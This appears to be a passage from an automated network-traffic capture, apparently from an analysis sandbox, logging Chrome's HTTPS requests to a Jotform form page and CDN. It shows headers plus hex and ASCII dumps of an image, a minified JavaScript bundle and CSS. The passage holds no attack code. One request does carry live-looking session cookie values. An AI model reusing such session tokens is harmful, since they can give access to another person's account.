                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 64 ac a1 14 b2 34 84 3f 71 52 e2 44 f0 04 d9 7d 95 54 af cd 3b ff 2c f7 a6 8a c0 36 38 35 5f b0 5c b0 60 70 a7 60 e4 3c d8 5d d2 80 85 22 f8 6c 28 02 5b 5f cb 22 2a 3d 0a 6f 96 3e c8 06 8b 8a 4d f1 ee 3b ef ea a3 f1 a8 ae 89 60 fa 7b 7a 04 5e 00 55 ab 8c b5 df 68 e5 14 a5 0f 22 92 d6 4a 36 15 69 a6 dc 23 25 34 a8 34 4a 0c 25 ad 14 45 5e 45 e0 a1 29 c6 e2 8c 07 0f 39 07 22 cb fa 8c 5c 5b 57 82 f3 18 85 f6 c0 16 02 e0 60 da 40 59 3f fb ef ff d1 2c 1b fb 6d f4 d5 af 03 df 65 59 77 0c 8a 9b 6e ba 29 60 80 22 23 78 36 6f 16 ec de af 4f 39 45 60 f7 6a 79 f8 f6 08 c7 ee dd bb 69 c2 03 46 03 0a 08 8f 16 fc de d7 b2 f2 eb 8b f7 12 97 14 60 e3 24 bd 7a 68 15 45 5e 49 d0 b8 d2 f9 27 dd 17 9f ab 22 b0 68 34 07 33 6e be e5 66 c5 3c 49 73 e2 44 67 35 2c 8c 42 11 7c b6
                                                                                                                                                                                                                                            Data Ascii: d4?qRD}T;,685_\`p`<]"l([_"*=o>M;`{z^Uh"J6i#%44J%E^E)9"\[W`@Y?,meYwn)`"#x6oO9E`jyiF`$zhE^I'"h43nf<IsDg5,B|


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            91192.168.2.1749805104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC862OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=144&height=144&time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1259INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:18 GMT
                                                                                                                                                                                                                                            jf-trace-id: 3b2e82d0c52937c5
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:20 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1862
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64bbf234213-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            92192.168.2.1749806104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC451OUTGET /s/umd/674ac14411e/for-push-notification.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 77901
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:18 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:48 GMT
                                                                                                                                                                                                                                            etag: "9cfc1b51e86ff2b286d08c07beabceab"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 265
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64c0b9a422e-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC941INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 66 6f 72 2d 70 75 73 68 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 22 5d 3d 74 28 29 3a 65 5b 22 66 6f 72 2d 70 75 73 68 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 22 5d 3d 74 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e
                                                                                                                                                                                                                                            Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-push-notification"]=t():e["for-push-notification"]=t()}(this,function(){return fun
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 76 61 72 20 6e 3d 72 28 38 33 37 34 33 29 28 72 28 39 32 33 37 33 29 2c 22 4d 61 70 22 29 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 7d 2c 31 30 35 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 37 33 36 34 39 29 2c 6f 3d 72 28 39 31 31 38 36 29 2c 69 3d 72 28 35 39 37 31 33 29 2c 73 3d 72 28 32 31 34 33 31 29 2c 61 3d 72 28 33 36 38 30 31 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 65 3f 30 3a 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 74 3c 72 3b 29 7b 76 61 72 20 6e 3d 65 5b 74 5d 3b 74 68 69 73 2e 73 65 74 28 6e 5b 30 5d 2c 6e 5b 31 5d 29 7d 7d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 6e 2c 75 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                            Data Ascii: var n=r(83743)(r(92373),"Map");e.exports=n},10503:function(e,t,r){var n=r(73649),o=r(91186),i=r(59713),s=r(21431),a=r(36801);function u(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}u.prototype.clear=n,u.prototy
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 69 28 65 29 2c 6c 3d 21 72 26 26 6f 28 65 29 2c 66 3d 21 72 26 26 21 6c 26 26 73 28 65 29 2c 70 3d 21 72 26 26 21 6c 26 26 21 66 26 26 75 28 65 29 2c 64 3d 72 7c 7c 6c 7c 7c 66 7c 7c 70 2c 68 3d 64 3f 6e 28 65 2e 6c 65 6e 67 74 68 2c 53 74 72 69 6e 67 29 3a 5b 5d 2c 67 3d 68 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 76 61 72 20 79 20 69 6e 20 65 29 28 74 7c 7c 63 2e 63 61 6c 6c 28 65 2c 79 29 29 26 26 21 28 64 26 26 28 22 6c 65 6e 67 74 68 22 3d 3d 79 7c 7c 66 26 26 28 22 6f 66 66 73 65 74 22 3d 3d 79 7c 7c 22 70 61 72 65 6e 74 22 3d 3d 79 29 7c 7c 70 26 26 28 22 62 75 66 66 65 72 22 3d 3d 79 7c 7c 22
                                                                                                                                                                                                                                            Data Ascii: rototype.hasOwnProperty;e.exports=function(e,t){var r=i(e),l=!r&&o(e),f=!r&&!l&&s(e),p=!r&&!l&&!f&&u(e),d=r||l||f||p,h=d?n(e.length,String):[],g=h.length;for(var y in e)(t||c.call(e,y))&&!(d&&("length"==y||f&&("offset"==y||"parent"==y)||p&&("buffer"==y||"
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 2c 37 39 30 37 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 34 37 30 32 38 29 2c 6f 3d 72 28 37 33 34 37 34 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 2c 69 2c 73 2c 61 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 72 7c 7c 28 6e 75 6c 6c 21 3d 74 26 26 6e 75 6c 6c 21 3d 72 26 26 28 6f 28 74 29 7c 7c 6f 28 72 29 29 3f 6e 28 74 2c 72 2c 69 2c 73 2c 65 2c 61 29 3a 74 21 3d 74 26 26 72 21 3d 72 29 7d 7d 2c 34 37 30 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 38 38 37 30 38 29 2c 6f 3d 72 28 39 38 37 30 35 29 2c 69 3d 72 28 34 32 38 31 33 29 2c 73 3d 72 28 36 36 38 32 29 2c 61 3d 72 28 39 39 36 36 37 29 2c 75 3d 72 28 31 30 31 36 33 29 2c 63 3d 72 28 33 34 38 30
                                                                                                                                                                                                                                            Data Ascii: ,79070:function(e,t,r){var n=r(47028),o=r(73474);e.exports=function e(t,r,i,s,a){return t===r||(null!=t&&null!=r&&(o(t)||o(r))?n(t,r,i,s,e,a):t!=t&&r!=r)}},47028:function(e,t,r){var n=r(88708),o=r(98705),i=r(42813),s=r(6682),a=r(99667),u=r(10163),c=r(3480
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 69 6e 74 38 41 72 72 61 79 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 31 36 41 72 72 61 79 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 33 32 41 72 72 61 79 5d 22 5d 3d 21 30 2c 73 5b 22 5b 6f 62 6a 65 63 74 20 41 72 67 75 6d 65 6e 74 73 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 42 6f 6f 6c 65 61 6e 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 44 61 74 61 56 69 65 77 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 44 61 74 65 5d 22 5d 3d 73 5b 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 5d 3d 73
                                                                                                                                                                                                                                            Data Ascii: int8Array]"]=s["[object Uint8ClampedArray]"]=s["[object Uint16Array]"]=s["[object Uint32Array]"]=!0,s["[object Arguments]"]=s["[object Array]"]=s["[object ArrayBuffer]"]=s["[object Boolean]"]=s["[object DataView]"]=s["[object Date]"]=s["[object Error]"]=s
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 73 68 61 72 65 64 5f 5f 22 5d 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 7d 2c 39 38 37 30 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 33 32 37 33 29 2c 6f 3d 72 28 39 31 36 33 34 29 2c 69 3d 72 28 32 39 39 31 34 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 73 2c 61 2c 75 29 7b 76 61 72 20 63 3d 31 26 72 2c 6c 3d 65 2e 6c 65 6e 67 74 68 2c 66 3d 74 2e 6c 65 6e 67 74 68 3b 69 66 28 6c 21 3d 66 26 26 21 28 63 26 26 66 3e 6c 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 70 3d 75 2e 67 65 74 28 65 29 2c 64 3d 75 2e 67 65 74 28 74 29 3b 69 66 28 70 26 26 64 29 72 65 74 75 72 6e 20 70 3d 3d 74 26 26 64 3d 3d 65 3b 76 61 72 20 68 3d 2d 31 2c 67 3d 21 30 2c 79 3d 32 26 72 3f 6e 65 77 20 6e 3a 76 6f 69
                                                                                                                                                                                                                                            Data Ascii: shared__"];e.exports=n},98705:function(e,t,r){var n=r(3273),o=r(91634),i=r(29914);e.exports=function(e,t,r,s,a,u){var c=1&r,l=e.length,f=t.length;if(l!=f&&!(c&&f>l))return!1;var p=u.get(e),d=u.get(t);if(p&&d)return p==t&&d==e;var h=-1,g=!0,y=2&r?new n:voi
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 66 28 6c 29 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 65 29 3d 3d 6c 2e 63 61 6c 6c 28 74 29 7d 72 65 74 75 72 6e 21 31 7d 7d 2c 36 36 38 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 33 38 31 34 33 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 69 2c 73 2c 61 29 7b 76 61 72 20 75 3d 31 26 72 2c 63 3d 6e 28 65 29 2c 6c 3d 63 2e 6c 65 6e 67 74 68 3b 69 66 28 6c 21 3d 6e 28 74 29 2e 6c 65 6e 67 74 68 26 26 21 75 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 66 3d 6c 3b 66 2d 2d 3b 29 7b 76 61 72 20 70 3d 63 5b 66 5d 3b 69 66 28 21 28 75 3f 70 20 69 6e 20 74 3a 6f 2e 63 61 6c 6c 28 74
                                                                                                                                                                                                                                            Data Ascii: f(l)return l.call(e)==l.call(t)}return!1}},6682:function(e,t,r){var n=r(38143),o=Object.prototype.hasOwnProperty;e.exports=function(e,t,r,i,s,a){var u=1&r,c=n(e),l=c.length;if(l!=n(t).length&&!u)return!1;for(var f=l;f--;){var p=c[f];if(!(u?p in t:o.call(t
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 72 65 74 75 72 6e 20 6e 26 26 28 74 3f 65 5b 61 5d 3d 72 3a 64 65 6c 65 74 65 20 65 5b 61 5d 29 2c 6f 7d 7d 2c 33 36 33 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 38 31 39 37 30 29 2c 6f 3d 72 28 31 36 38 32 37 29 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 73 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 61 3d 73 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 5b 5d 3a 6e 28 73 28 65 3d 4f 62 6a 65 63 74 28 65 29 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 65 2c 74 29 7d 29 7d 3a 6f 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d
                                                                                                                                                                                                                                            Data Ascii: return n&&(t?e[a]=r:delete e[a]),o}},36353:function(e,t,r){var n=r(81970),o=r(16827),i=Object.prototype.propertyIsEnumerable,s=Object.getOwnPropertySymbols,a=s?function(e){return null==e?[]:n(s(e=Object(e)),function(t){return i.call(e,t)})}:o;e.exports=a}
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3b 72 65 74 75 72 6e 20 6e 3f 76 6f 69 64 20 30 21 3d 3d 74 5b 65 5d 3a 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 7d 2c 34 32 37 32 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 39 33 33 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 7a 65 2b 3d 74 68 69 73 2e 68 61 73 28 65 29 3f 30 3a 31 2c 72 5b 65 5d 3d 6e 26 26 76 6f 69 64 20 30 3d 3d 3d 74 3f 22 5f 5f 6c 6f 64 61 73 68 5f 68 61 73 68 5f 75 6e 64 65 66 69 6e 65 64 5f 5f 22 3a 74 2c 74 68 69 73 7d 7d 2c 35 39 30 39 39 3a 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: orts=function(e){var t=this.__data__;return n?void 0!==t[e]:o.call(t,e)}},42721:function(e,t,r){var n=r(9337);e.exports=function(e,t){var r=this.__data__;return this.size+=this.has(e)?0:1,r[e]=n&&void 0===t?"__lodash_hash_undefined__":t,this}},59099:funct
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 31 29 2c 2d 2d 74 68 69 73 2e 73 69 7a 65 2c 21 30 29 7d 7d 2c 34 34 38 35 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 35 33 31 36 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 72 3d 6e 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 72 3c 30 3f 76 6f 69 64 20 30 3a 74 5b 72 5d 5b 31 5d 7d 7d 2c 34 30 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 35 33 31 36 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 65 29 3e 2d 31 7d 7d 2c 32 38 35 34 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72
                                                                                                                                                                                                                                            Data Ascii: 1),--this.size,!0)}},44859:function(e,t,r){var n=r(53162);e.exports=function(e){var t=this.__data__,r=n(t,e);return r<0?void 0:t[r][1]}},4073:function(e,t,r){var n=r(53162);e.exports=function(e){return n(this.__data__,e)>-1}},28541:function(e,t,r){var n=r


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            93192.168.2.1749807104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC593OUTGET /s/portal/674ac14411e/static/css/DocumentPreview.6d5451e5.chunk.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC418INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 8170
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "5a464ea3ebb900946ebf2300e67d3bc5"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64eab584294-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC951INData Raw: 2e 70 72 65 76 69 65 77 2d 6f 72 61 6e 67 65 2d 35 30 30 7b 63 6f 6c 6f 72 3a 23 66 66 36 31 30 30 7d 2e 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 34 30 30 7b 63 6f 6c 6f 72 3a 23 66 66 62 36 32 39 7d 2e 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 36 30 30 7b 63 6f 6c 6f 72 3a 23 66 34 39 32 30 30 7d 2e 70 72 65 76 69 65 77 2d 67 72 65 65 6e 2d 35 30 30 7b 63 6f 6c 6f 72 3a 23 36 34 62 32 30 30 7d 2e 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 7b 63 6f 6c 6f 72 3a 23 30 30 37 38 65 38 7d 2e 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 36 30 30 7b 63 6f 6c 6f 72 3a 23 30 30 36 36 63 33 7d 2e 70 72 65 76 69 65 77 2d 70 75 72 70 6c 65 2d 35 30 30 7b 63 6f 6c 6f 72 3a 23 38 39 32 64 63 61 7d 2e 70 72 65 76 69 65 77 2d 72 65 64 2d 35 30 30 7b 63 6f 6c 6f 72
                                                                                                                                                                                                                                            Data Ascii: .preview-orange-500{color:#ff6100}.preview-yellow-400{color:#ffb629}.preview-yellow-600{color:#f49200}.preview-green-500{color:#64b200}.preview-blue-500{color:#0078e8}.preview-blue-600{color:#0066c3}.preview-purple-500{color:#892dca}.preview-red-500{color
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3a 2e 37 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 61 6c 74 65 72 6e 61 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 66 6f 72 77 61 72 64 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 7d 2e 6a 50 72 65 76 69 65 77 20 2e 6a 50 72 65 76 69 65 77 2d 68 65 61 64 65 72 20 2e 66 69 6c 65 50 72 65 76 69 65 77 48 6f 6c 64 65 72 7b 77 69 64 74 68 3a 33 30 70 78 7d 2e 6a 50 72 65 76 69 65 77 20 2e 6a 50 72 65 76 69 65 77 2d 68 65 61 64 65 72 20 2e 66 69 6c 65 54 79 70 65 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 68 65 61 64 65 72 7b 7a 2d 69 6e 64 65 78 3a 32 3b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                            Data Ascii: :.7s;animation-direction:alternate;animation-fill-mode:forwards;position:fixed;top:0;left:0}.jPreview .jPreview-header .filePreviewHolder{width:30px}.jPreview .jPreview-header .fileType{letter-spacing:-.5px;font-size:8px}.jPreview-header{z-index:2;backgro
